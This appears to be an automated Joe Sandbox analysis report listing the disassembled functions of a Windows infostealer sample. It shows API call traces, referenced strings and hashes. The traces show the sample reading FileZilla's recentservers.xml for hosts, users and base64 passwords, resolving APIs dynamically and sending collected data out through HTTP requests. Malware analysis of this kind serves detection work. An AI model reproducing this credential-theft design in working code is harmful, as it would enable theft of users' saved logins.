lstrcat.KERNEL32(?,04078328), ref: 00407473
lstrcat.KERNEL32(?,040780B8), ref: 00407486
lstrcat.KERNEL32(?,?), ref: 0040749A
lstrcat.KERNEL32(?,?), ref: 004074AE
lstrcat.KERNEL32(?,?), ref: 004074C2
lstrcat.KERNEL32(?,04076A68), ref: 004074D6
lstrcat.KERNEL32(?,04076BA0), ref: 004074EA
lstrcat.KERNEL32(?,04078238), ref: 004074FD
lstrcat.KERNEL32(?,04078328), ref: 00407511
lstrcat.KERNEL32(?,04078120), ref: 00407525
lstrcat.KERNEL32(?,?), ref: 00407539
lstrcat.KERNEL32(?,?), ref: 0040754D
lstrcat.KERNEL32(?,?), ref: 00407561
lstrcat.KERNEL32(?,04076A68), ref: 00407574
lstrcat.KERNEL32(?,04076BA0), ref: 00407588
lstrcat.KERNEL32(?,04078238), ref: 0040759C
lstrcat.KERNEL32(?,04078328), ref: 004075AF
lstrcat.KERNEL32(?,04078188), ref: 004075C3
lstrcat.KERNEL32(?,?), ref: 004075D7
lstrcat.KERNEL32(?,?), ref: 004075EB
lstrcat.KERNEL32(?,?), ref: 004075FF
lstrcat.KERNEL32(?,04076A68), ref: 00407613
lstrcat.KERNEL32(?,04076BA0), ref: 00407626
lstrcat.KERNEL32(?,04078238), ref: 0040763A
lstrcat.KERNEL32(?,04078328), ref: 0040764E

Part of subcall function 00406FA0: lstrcat.KERNEL32(30A54020,0041DEB8), ref: 00406FD6
Part of subcall function 00406FA0: lstrcat.KERNEL32(30A54020,00000000), ref: 00407018
Part of subcall function 00406FA0: lstrcat.KERNEL32(30A54020, : ), ref: 0040702A
Part of subcall function 00406FA0: lstrcat.KERNEL32(30A54020,00000000), ref: 0040705F
Part of subcall function 00406FA0: lstrcat.KERNEL32(30A54020,0041DEC0), ref: 00407070
Part of subcall function 00406FA0: lstrcat.KERNEL32(30A54020,00000000), ref: 004070A3
Part of subcall function 00406FA0: lstrcat.KERNEL32(30A54020,0041DEC4), ref: 004070BD
Part of subcall function 00406FA0: task.LIBCPMTD ref: 004070CB

lstrcat.KERNEL32(?,04070798), ref: 004077DB
lstrcat.KERNEL32(?,040774F0), ref: 004077EE
lstrlen.KERNEL32(30A54020), ref: 004077FB
lstrlen.KERNEL32(30A54020), ref: 0040780B

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04070728), ref: 00404ED9

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$Heap$AllocateInternetOpenProcesslstrcpytask
String ID:
API String ID: 3958002797-0
Opcode ID: 1a4790090b2145be4414eb9d8ec18fb4d399ff29a204be037550b3e2c137635a
Instruction ID: 3e78b0701875fb024adfa953bd7607f570b92d72e3b87f8e208063dda3fe5bd2
Opcode Fuzzy Hash: 1a4790090b2145be4414eb9d8ec18fb4d399ff29a204be037550b3e2c137635a
Instruction Fuzzy Hash: D33234B6D01A14ABCB35EBA0DC89DDE737DAB48704F404699B20A66090DF78E7C5CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0040EA90 Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 363
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A

Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552

strtok_s.MSVCRT ref: 0040EB5B
GetProcessHeap.KERNEL32(00000000,000F423F,0041D77A,0041D777,0041D776,0041D773), ref: 0040EBA2
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040EBA9
StrStrA.SHLWAPI(00000000,<Host>), ref: 0040EBC5
lstrlen.KERNEL32(00000000), ref: 0040EBD3

Part of subcall function 00414FA0: malloc.MSVCRT ref: 00414FA8
Part of subcall function 00414FA0: strncpy.MSVCRT ref: 00414FC3

StrStrA.SHLWAPI(00000000,<Port>), ref: 0040EC0F
lstrlen.KERNEL32(00000000), ref: 0040EC1D
StrStrA.SHLWAPI(00000000,<User>), ref: 0040EC59
lstrlen.KERNEL32(00000000), ref: 0040EC67
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040ECA3
lstrlen.KERNEL32(00000000), ref: 0040ECB5
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040ED42
lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED5A
lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED72
lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED8A
lstrcat.KERNEL32(?,browser: FileZilla), ref: 0040EDA2
lstrcat.KERNEL32(?,profile: null), ref: 0040EDB1
lstrcat.KERNEL32(?,url: ), ref: 0040EDC0
lstrcat.KERNEL32(?,00000000), ref: 0040EDD3
lstrcat.KERNEL32(?,0041DD34), ref: 0040EDE2
lstrcat.KERNEL32(?,00000000), ref: 0040EDF5
lstrcat.KERNEL32(?,0041DD38), ref: 0040EE04
lstrcat.KERNEL32(?,login: ), ref: 0040EE13
lstrcat.KERNEL32(?,00000000), ref: 0040EE26
lstrcat.KERNEL32(?,0041DD44), ref: 0040EE35
lstrcat.KERNEL32(?,password: ), ref: 0040EE44
lstrcat.KERNEL32(?,00000000), ref: 0040EE57
lstrcat.KERNEL32(?,0041DD54), ref: 0040EE66
lstrcat.KERNEL32(?,0041DD58), ref: 0040EE75
strtok_s.MSVCRT ref: 0040EEB9
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040EECE
memset.MSVCRT ref: 0040EF17

Strings

login: , xrefs: 0040EE0A
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 0040EAE4
<Host>, xrefs: 0040EBBC
url: , xrefs: 0040EDB7
<Pass encoding="base64">, xrefs: 0040EC9A
browser: FileZilla, xrefs: 0040ED99
<User>, xrefs: 0040EC50
<Port>, xrefs: 0040EC06
password: , xrefs: 0040EE3B
profile: null, xrefs: 0040EDA8

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$ChangeCloseCreateFindFolderFreeNotificationPathProcessReadSizemallocmemsetstrncpy
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 1266801029-555421843
Opcode ID: a0f53b9dee15c23e45b6c59822f111f8c24a56193fda47159abce8afca70eb89
Instruction ID: d9186ee441f73b04c887f2efee86d04259a2264df0fa853aa1509dbc15227f06
Opcode Fuzzy Hash: a0f53b9dee15c23e45b6c59822f111f8c24a56193fda47159abce8afca70eb89
Instruction Fuzzy Hash: 3FD174B5D00208ABCB14EBF1DD56EEE7739AF44304F50851EF106B6095DF38AA85CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00415ED0 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,04052928), ref: 00415F11
GetProcAddress.KERNEL32(74DD0000,04052958), ref: 00415F2A
GetProcAddress.KERNEL32(74DD0000,040528F8), ref: 00415F42
GetProcAddress.KERNEL32(74DD0000,04052970), ref: 00415F5A
GetProcAddress.KERNEL32(74DD0000,04052988), ref: 00415F73
GetProcAddress.KERNEL32(74DD0000,0406DC80), ref: 00415F8B
GetProcAddress.KERNEL32(74DD0000,04054058), ref: 00415FA3
GetProcAddress.KERNEL32(74DD0000,04053E98), ref: 00415FBC
GetProcAddress.KERNEL32(74DD0000,04070438), ref: 00415FD4
GetProcAddress.KERNEL32(74DD0000,04070348), ref: 00415FEC
GetProcAddress.KERNEL32(74DD0000,040704C8), ref: 00416005
GetProcAddress.KERNEL32(74DD0000,04070228), ref: 0041601D
GetProcAddress.KERNEL32(74DD0000,04053EB8), ref: 00416035
GetProcAddress.KERNEL32(74DD0000,040703D8), ref: 0041604E
GetProcAddress.KERNEL32(74DD0000,040704E0), ref: 00416066
GetProcAddress.KERNEL32(74DD0000,040541B8), ref: 0041607E
GetProcAddress.KERNEL32(74DD0000,04070288), ref: 00416097
GetProcAddress.KERNEL32(74DD0000,040703F0), ref: 004160AF
GetProcAddress.KERNEL32(74DD0000,04053F98), ref: 004160C7
GetProcAddress.KERNEL32(74DD0000,04070240), ref: 004160E0
GetProcAddress.KERNEL32(74DD0000,04054098), ref: 004160F8
LoadLibraryA.KERNEL32(04070450,?,004136C0), ref: 0041610A
LoadLibraryA.KERNEL32(040704F8,?,004136C0), ref: 0041611B
LoadLibraryA.KERNEL32(04070408,?,004136C0), ref: 0041612D
LoadLibraryA.KERNEL32(04070210,?,004136C0), ref: 0041613F
LoadLibraryA.KERNEL32(04070378,?,004136C0), ref: 00416150
GetProcAddress.KERNEL32(75A70000,04070258), ref: 00416172
GetProcAddress.KERNEL32(75290000,04070420), ref: 00416193
GetProcAddress.KERNEL32(75290000,04070270), ref: 004161AB
GetProcAddress.KERNEL32(75BD0000,04070300), ref: 004161CD
GetProcAddress.KERNEL32(75450000,04054038), ref: 004161EE
GetProcAddress.KERNEL32(76E90000,0406DCA0), ref: 0041620F
GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00416226

Strings

NtQueryInformationProcess, xrefs: 0041621A

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 2238633743-2781105232
Opcode ID: 4bf4faa6d80337b6a8c58e308678245154ae8b5c2676724c8d6fcdc68551e2bc
Instruction ID: 1024ce913f91588aaf476b7e35ab3ad31cc185c195c2877b0ef9f81f7e935ec9
Opcode Fuzzy Hash: 4bf4faa6d80337b6a8c58e308678245154ae8b5c2676724c8d6fcdc68551e2bc
Instruction Fuzzy Hash: 4CA16FB5910E10AFC374DFA8FE88A1637BBBBCC3117116519A60AC72A0DF759482CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00404DC0 Relevance: 54.8, APIs: 22, Strings: 9, Instructions: 569
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

lstrlen.KERNEL32(00000000), ref: 00404E4A

Part of subcall function 004155A0: CryptBinaryToStringA.CRYPT32(00000000,>N@,40000001,00000000,00000000), ref: 004155C0

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
StrCmpCA.SHLWAPI(?,04070728), ref: 00404ED9
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FF4
HttpOpenRequestA.WININET(00000000,04070628,?,04078280,00000000,00000000,00400100,00000000), ref: 00405058

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,04070658,00000000,?,04077998,00000000,?,0041E098,00000000,?,00410996), ref: 004053EB
lstrlen.KERNEL32(00000000), ref: 004053FF
GetProcessHeap.KERNEL32(00000000,?), ref: 00405410
HeapAlloc.KERNEL32(00000000), ref: 00405417
lstrlen.KERNEL32(00000000), ref: 0040542C
memcpy.MSVCRT ref: 00405443
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 0040545D
memcpy.MSVCRT ref: 0040546A
lstrlen.KERNEL32(00000000), ref: 0040547C
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405495
memcpy.MSVCRT ref: 004054A5
lstrlen.KERNEL32(00000000,?,?), ref: 004054C2
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004054D6
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00405501
InternetCloseHandle.WININET(00000000), ref: 00405565
InternetCloseHandle.WININET(00000000), ref: 00405572
InternetCloseHandle.WININET(00000000), ref: 0040557C

Strings

", xrefs: 00405278
", xrefs: 004053BA
J&f, xrefs: 00405029
", xrefs: 00405136
------, xrefs: 00404F4B
--, xrefs: 00404F34
------, xrefs: 004051AD
------, xrefs: 0040506B
------, xrefs: 004052EF

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandlememcpy$HeapHttpOpenRequestlstrcat$AllocBinaryConnectCrackCryptFileProcessReadSendString
String ID: ------$"$"$"$--$------$------$------$J&f
API String ID: 2633831070-3705675087
Opcode ID: 6549ced5a5c600e8a27fb6237dfbce87f6e9a99a23ea1def5b08f040f96c31ba
Instruction ID: 5eac6181e64dcc8a416a420aa9bf91bf90c69560f183aa6c55bc1ab780bc5ff6
Opcode Fuzzy Hash: 6549ced5a5c600e8a27fb6237dfbce87f6e9a99a23ea1def5b08f040f96c31ba
Instruction Fuzzy Hash: 55324375920218ABCB14EBA1DC51FEEB779BF54704F40419EF10662091DF38AB89CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00405610 Relevance: 47.7, APIs: 19, Strings: 8, Instructions: 493
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004056A8
StrCmpCA.SHLWAPI(?,04070728), ref: 004056C3
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405843
lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,040707A8,00000000,?,04077998,00000000,?,0041E0D8), ref: 00405B1E
lstrlen.KERNEL32(00000000), ref: 00405B2F
GetProcessHeap.KERNEL32(00000000,?), ref: 00405B40
HeapAlloc.KERNEL32(00000000), ref: 00405B47
lstrlen.KERNEL32(00000000), ref: 00405B5C
memcpy.MSVCRT ref: 00405B73
lstrlen.KERNEL32(00000000), ref: 00405B85
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405B9E
memcpy.MSVCRT ref: 00405BAB
lstrlen.KERNEL32(00000000,?,?), ref: 00405BC8
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405BDC
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405BF9
InternetCloseHandle.WININET(00000000), ref: 00405C5D
InternetCloseHandle.WININET(00000000), ref: 00405C6A
HttpOpenRequestA.WININET(00000000,04070628,?,04078280,00000000,00000000,00400100,00000000), ref: 004058A8

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

InternetCloseHandle.WININET(00000000), ref: 00405C74

Strings

------, xrefs: 00405746
J&f, xrefs: 00405878
", xrefs: 00405985
------, xrefs: 004059FC
", xrefs: 00405AC6
-A, xrefs: 0040566F, 00405D14, 004056F7, 00405700, 0040576E, 004057E5, 004058E3, 00405A24, 00405771, 004057E8, 004058E6, 00405A27
-A, xrefs: 00405620, 00405D27, 00405623
------, xrefs: 004058BB

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
String ID: "$"$------$------$------$-A$-A$J&f
API String ID: 148854478-1022722094
Opcode ID: 29ebbbfae3119281cd9698afcc6b9225f01ace085e969b994f58abaeb61f6f03
Instruction ID: 38116f3ce93ed53bffdba46f35b2307ef6cb7c9f678a3856a9fc947e80efe624
Opcode Fuzzy Hash: 29ebbbfae3119281cd9698afcc6b9225f01ace085e969b994f58abaeb61f6f03
Instruction Fuzzy Hash: A0125175920218AACB14EBA1DC95FDEB739BF14304F41429EF10A63091DF386B89CF68

Uniqueness

Uniqueness Score: -1.00%

Function 0040A030 Relevance: 32.0, APIs: 21, Instructions: 494
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00417070: StrCmpCA.SHLWAPI(00000000,0041DBD0,0040C8F2,0041DBD0,00000000), ref: 0041708F

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040A362
RtlAllocateHeap.NTDLL(00000000), ref: 0040A369
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A14A

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0406DD00,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

lstrcat.KERNEL32(?,00000000), ref: 0040A4AA
lstrcat.KERNEL32(?,0041DA80), ref: 0040A4B9
lstrcat.KERNEL32(?,00000000), ref: 0040A4CC
lstrcat.KERNEL32(?,0041DA84), ref: 0040A4DB
lstrcat.KERNEL32(?,00000000), ref: 0040A4EE
lstrcat.KERNEL32(?,0041DA88), ref: 0040A4FD
lstrcat.KERNEL32(?,00000000), ref: 0040A510
lstrcat.KERNEL32(?,0041DA8C), ref: 0040A51F
lstrcat.KERNEL32(?,00000000), ref: 0040A532
lstrcat.KERNEL32(?,0041DA90), ref: 0040A541
lstrcat.KERNEL32(?,00000000), ref: 0040A554
lstrcat.KERNEL32(?,0041DA94), ref: 0040A563

Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

lstrcat.KERNEL32(?,00000000), ref: 0040A5AC
lstrcat.KERNEL32(?,0041DA98), ref: 0040A5C6
lstrlen.KERNEL32(?), ref: 0040A605
lstrlen.KERNEL32(?), ref: 0040A614
memset.MSVCRT ref: 0040A65D

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

DeleteFileA.KERNEL32(00000000), ref: 0040A689

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpylstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessmemcmp
String ID:
API String ID: 2228671196-0
Opcode ID: ddc9db654cbe5268d6b62ae2fc0e237d04748efe997b257aa277234eefd120ab
Instruction ID: c7be15c6cc4abab23e8f274795eadccbdda502ec8511485448b77053ecd04baf
Opcode Fuzzy Hash: ddc9db654cbe5268d6b62ae2fc0e237d04748efe997b257aa277234eefd120ab
Instruction Fuzzy Hash: B0029475900208ABCB14EBA1DC96EEE773ABF14305F11415EF507B6091DF38AE85CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040C640 Relevance: 31.9, APIs: 21, Instructions: 374
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,040779F8,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C6D3
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040C817
RtlAllocateHeap.NTDLL(00000000), ref: 0040C81E
lstrcat.KERNEL32(?,00000000), ref: 0040C958
lstrcat.KERNEL32(?,0041DBD8), ref: 0040C967
lstrcat.KERNEL32(?,00000000), ref: 0040C97A
lstrcat.KERNEL32(?,0041DBDC), ref: 0040C989
lstrcat.KERNEL32(?,00000000), ref: 0040C99C
lstrcat.KERNEL32(?,0041DBE0), ref: 0040C9AB
lstrcat.KERNEL32(?,00000000), ref: 0040C9BE
lstrcat.KERNEL32(?,0041DBE4), ref: 0040C9CD
lstrcat.KERNEL32(?,00000000), ref: 0040C9E0
lstrcat.KERNEL32(?,0041DBE8), ref: 0040C9EF
lstrcat.KERNEL32(?,00000000), ref: 0040CA02
lstrcat.KERNEL32(?,0041DBEC), ref: 0040CA11
lstrcat.KERNEL32(?,00000000), ref: 0040CA24
lstrcat.KERNEL32(?,0041DBF0), ref: 0040CA33

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0406DD00,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

lstrlen.KERNEL32(?), ref: 0040CA7A
lstrlen.KERNEL32(?), ref: 0040CA89
memset.MSVCRT ref: 0040CAD2

Part of subcall function 00417070: StrCmpCA.SHLWAPI(00000000,0041DBD0,0040C8F2,0041DBD0,00000000), ref: 0041708F

DeleteFileA.KERNEL32(00000000), ref: 0040CAFE

Memory Dump Source

Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5qk.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
String ID:
API String ID: 1973479514-0
Opcode ID: b88ce79a549242afc3ca3ed91b5888e783d7b8ee3b3d8d3205f4e2b3c424bd9c
Instruction ID: d19a215fe10c8d685073d70632a82ede6d900fe39af11de2b9913f634a463049
Opcode Fuzzy Hash: b88ce79a549242afc3ca3ed91b5888e783d7b8ee3b3d8d3205f4e2b3c424bd9c
Instruction Fuzzy Hash: B1E15275910208ABCB14EBA1DD96EEE773ABF14305F11415EF107B6091DF38AE85CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404540 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 479
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
